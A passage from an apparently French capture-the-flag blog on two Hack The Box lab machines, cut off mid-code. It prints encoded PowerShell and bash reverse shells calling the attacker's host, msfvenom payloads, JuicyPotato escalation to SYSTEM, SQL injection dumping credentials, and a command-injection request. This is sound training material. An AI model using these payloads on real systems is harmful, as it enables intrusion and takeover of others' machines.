class="nv">JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest Bastard $ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57491. </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span></code></pre></td></tr></table> </div> </div><h3 id="better-stable-shell">Better Stable Shell </h3><p>J&rsquo;ai trouvé un moyen de faire un shell encore plus stable. Le privesc ne marchait meme pas avec l&rsquo;autre shell&hellip; On ne voyait pas les erreurs non plus. Il vaut mieu generer avec msfvenom un shell.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">9999</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; .<span class="se">\s</span>hell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9999</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9999 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9999 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57676. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="seimpersonateprivilege---juicypotato">SEImpersonatePrivilege - JuicyPotato </h3><p>On exploit avec JuicyPotato (j&rsquo;ai vraiment beaucoup galérer&hellip;). On génére un deuxieme rev shell en .exe sur un autre port :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">8888</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell2.exe </span></span></code></pre></td></tr></table> </div> </div><p>On copie shell2.exe sur la machine puis on execute JuicyPotato.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; ./JP.exe -p cmd.exe -a <span class="s1">&#39;/c C:\inetpub\drupal-7.54\shell2.exe&#39;</span> -l <span class="m">4444</span> -t * -c <span class="s1">&#39;{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}&#39;</span> </span></span><span class="line"><span class="cl">Testing <span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span> <span class="m">4444</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> authresult <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span><span class="p">;</span>NT AUTHORITY<span class="se">\S</span>YSTEM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessWithTokenW OK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest /workspace $ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::8888 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:8888 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57681. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">47f4.....3c54 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>un reverse shell en utilisant msfvenom semble plus stable (affiche les erreurs aussi) que le powershell -e &hellip;. que j&rsquo;ai utilisé. Peut etre a utilisé en priorité la prochaine fois ?</li> <li>Attention au CLSID. Toujours tester plusieurs. NE JAMAIS FAIRE CONFIANCE A CELUI PAR DEFAUT. Regarder sur : <ul> <li><a class="link" href="https://ohpe.it/juicy-potato/CLSID/" target="_blank" rel="noopener" >https://ohpe.it/juicy-potato/CLSID/</a></li> <li><a class="link" href="https://github.com/ohpe/juicy-potato/tree/master/CLSID/" target="_blank" rel="noopener" >https://github.com/ohpe/juicy-potato/tree/master/CLSID/</a></li> </ul> </li> </ul>https://leopoldabgn.github.io/writeups/p/cronos-htb/Fri, 11 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cronos-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Cronos cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Cronos</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.13</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -vvv 10.10.10.13 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 18b973826f26c7788f1b3988d802cee8 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 1ae606a6050bbb4192b028bf7fe5963b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 1a0ee7ba00cc020104cda3a93f5e2220 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">63</span> ISC BIND 9.10.3-P4 <span class="o">(</span>Ubuntu Linux<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> dns-nsid: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ bind.version: 9.10.3-P4-Ubuntu </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: POST OPTIONS GET HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Apache2 Ubuntu Default Page: It works </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="dig">dig </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## dig axfr @10.10.10.13 cronos.htb</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;</span> &lt;&lt;&gt;&gt; DiG 9.18.33-1~deb12u2-Debian &lt;&lt;&gt;&gt; axfr @10.10.10.13 cronos.htb </span></span><span class="line"><span class="cl"><span class="p">;</span> <span class="o">(</span><span class="m">1</span> server found<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> global options: +cmd </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span> </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN NS ns1.cronos.htb. </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">admin.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">ns1.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">www.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> Query time: <span class="m">20</span> msec </span></span><span class="line"><span class="cl"><span class="p">;;</span> SERVER: 10.10.10.13#53<span class="o">(</span>10.10.10.13<span class="o">)</span> <span class="o">(</span>TCP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> WHEN: Thu Jul <span class="m">10</span> 22:16:46 CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> XFR size: <span class="m">7</span> records <span class="o">(</span>messages 1, bytes 203<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="admincronoshtb-login-page">admin.cronos.htb login page </h3><h3 id="sqlmap">sqlmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> </span></span><span class="line"><span class="cl">&gt; username field is vulnerable to blind SQL Injection ! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> --current-db </span></span><span class="line"><span class="cl">&gt; admin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin --tables </span></span><span class="line"><span class="cl">&gt; users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin -T users --columns </span></span><span class="line"><span class="cl">&gt; Too slow... Trying to guess <span class="s2">&#34;password&#34;</span> field and it works ! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin -T users -C password --dump </span></span><span class="line"><span class="cl">&gt; 4f5fffa7b2340178a716e3832451e058 </span></span></code></pre></td></tr></table> </div> </div><p>Sur crackstation : Not found. Hashcat avec rockyou.txt : Not found.</p> <p>J&rsquo;ai cherché le hachage sur google : &ldquo;4f5fffa7b2340178a716e3832451e058&rdquo; Bingo ! On trouve le mot de passe : 1327663704</p> <p>On essaye les credentials sur la page de login de admin.cronos.htb et ça marche :</p> <ul> <li>user: admin</li> <li>pass: 1327663704</li> </ul> <p>Après review du code source (plus tard) on découvre que : $myusername = $_POST[&lsquo;username&rsquo;]; $mypassword = md5($_POST[&lsquo;password&rsquo;]);</p> <h3 id="command-injection---admin-dashboard">Command Injection - admin dashboard </h3><p>On peut faire des ping et des traceroute sur la page d&rsquo;admin. En utilisant burp on peut modifier la commande pour executer ce qu&rsquo;on veut. On peut alors executer un reverse shell vers notre machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /welcome.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: admin.cronos.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">16</span> </span></span><span class="line"><span class="cl">Origin: http://admin.cronos.htb </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://admin.cronos.htb/welcome.php </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>0p5lct2jjmbq5neupststnl996 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">command</span><span class="o">=</span>echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMSAwPiYx+<span class="p">|</span>+base64+-d+<span class="p">|</span>+bash<span class="p">&amp;</span><span class="nv">host</span><span class="o">=</span>z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13:55658. </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -V </span></span></span><span class="line"><span class="cl"><span class="s1">Python 3.5.2 </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>2<span class="o">]</span> + <span class="m">27640</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Jul 10, <span class="m">2025</span> - 23:33:12 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Cronos <span class="c1"># stty raw -echo;fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2<span class="o">]</span> - <span class="m">27640</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ whoami </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ <span class="nb">cd</span> /home </span></span><span class="line"><span class="cl">www-data@cronos:/home$ <span class="nb">cd</span> noulis/ </span></span><span class="line"><span class="cl">www-data@cronos:/home/noulis$ cat user.txt </span></span><span class="line"><span class="cl">fe30.....e498 </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---root">www-data -&gt; root </h2><h3 id="laravel-root-crontab">laravel root crontab </h3><p>En utilisant linpeas, on s&rsquo;en compte que l&rsquo;utilisateur <strong>root</strong> execute chaque minute :</p> <blockquote> <p>php /var/www/laravel/artisan schedule:run &raquo; /dev/null 2&gt;&amp;1</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╔══════════╣ Check <span class="k">for</span> vulnerable cron <span class="nb">jobs</span> </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs </span></span><span class="line"><span class="cl">══╣ Cron <span class="nb">jobs</span> list </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">SHELL</span><span class="o">=</span>/bin/sh </span></span><span class="line"><span class="cl"><span class="nv">PATH</span><span class="o">=</span>/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">17</span> * * * * root <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.hourly </span></span><span class="line"><span class="cl"><span class="m">25</span> 6 * * * root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.daily <span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">47</span> 6 * * 7 root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.weekly <span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">52</span> 6 <span class="m">1</span> * * root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.monthly <span class="o">)</span> </span></span><span class="line"><span class="cl">* * * * * root php /var/www/laravel/artisan schedule:run &gt;&gt; /dev/null 2&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><p>Grâce à ChatGPT, on comprend qu&rsquo;il faut modifier le fichier <strong>/var/www/laravel/app/Console/Kernel.php</strong>. La fonction schedule de ce fichier est executé toutes les minutes par root. Il suffit donc d&rsquo;executer une commande de reverse shell et le tour est joué.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 